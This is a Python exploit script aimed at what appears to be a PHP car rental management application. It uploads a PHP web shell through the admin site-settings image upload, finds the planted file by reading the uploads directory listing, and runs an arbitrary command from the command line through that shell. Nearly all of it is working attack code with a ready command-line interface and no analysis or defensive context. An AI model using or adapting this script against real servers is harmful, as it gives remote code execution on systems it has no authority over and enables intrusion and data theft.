import requests
import argparse
import re

def upload_shell(base_url, session_id, filename, shell_code):
    """Uploads a PHP shell via the System Settings file upload functionality."""
    upload_url = f"{base_url}/car_rental/admin/index.php?page=site_settings"
    cookies = {'PHPSESSID': session_id}

    # Form data
    payload = {
        'name': 'Test System',
        'email': '[email protected]',
        'contact': '1234567890',
        'about': 'Test Upload'
    }

    # File upload with the PHP shell
    files = {
        'img': (filename, shell_code, 'application/octet-stream')
    }

    print("[+] Attempting to upload shell...")
    response = requests.post(upload_url, cookies=cookies, data=payload, files=files)

    if response.status_code == 200 and 'success' in response.text.lower():
        print("[+] Shell uploaded successfully. Check the /car_rental/admin/assets/uploads/ directory.")
        return True
    else:
        print("[-] Upload failed.")
        print(f"[*] Server responded with status code: {response.status_code}")
        print(f"[*] Response text: {response.text}")
        return False

def find_uploaded_file(base_url):
    """Retrieves the list of files in the upload directory to find the PHP shell."""
    directory_url = f"{base_url}/car_rental/admin/assets/uploads/"
    response = requests.get(directory_url)

    if response.status_code == 200:
        # Regex to identify uploaded PHP files
        uploaded_files = re.findall(r'href="([\w]+_php\.php)"', response.text)
        if uploaded_files:
            print(f"[+] Found uploaded PHP files: {uploaded_files}")
            return uploaded_files[-1]  # Assuming the last one is the latest
        else:
            print("[-] No PHP shell files found in uploads.")
            return None
    else:
        print(f"[-] Could not access the uploads directory. Status code: {response.status_code}")
        return None

def execute_command(base_url, session_id, filename, command):
    """Executes a command via the uploaded PHP shell."""
    target_url = f"{base_url}/car_rental/admin/assets/uploads/{filename}?cmd={command}"
    cookies = {'PHPSESSID': session_id}

    print(f"[+] Executing command '{command}' on the uploaded shell...")
    response = requests.get(target_url, cookies=cookies)

    if response.status_code == 200:
        print("[+] Command Output:")
        print(response.text)
    else:
        print("[-] Command execution failed.")
        print(f"[*] Server responded with status code: {response.status_code}")
        print(f"[*] Response text: {response.text}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Upload and execute a PHP web shell.")
    parser.add_argument("-u", "--url", required=True, help="Base URL (e.g., http://localhost)")
    parser.add_argument("-c", "--cookie", required=True, help="PHP Session ID (PHPSESSID)")
    parser.add_argument("-cmd", "--command", required=True, help="Command to run on the server (e.g., 'hostname')")

    args = parser.parse_args()

    # Define shell code and filename
    filename = "shell_code.php"
    shell_code = '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>'

    # Step 1: Upload the shell
    if upload_shell(args.url, args.cookie, filename, shell_code):
        # Step 2: Find the uploaded shell filename in the directory
        uploaded_filename = find_uploaded_file(args.url)

        # Step 3: Execute the command if the file was found
        if uploaded_filename:
            execute_command(args.url, args.cookie, uploaded_filename, args.command)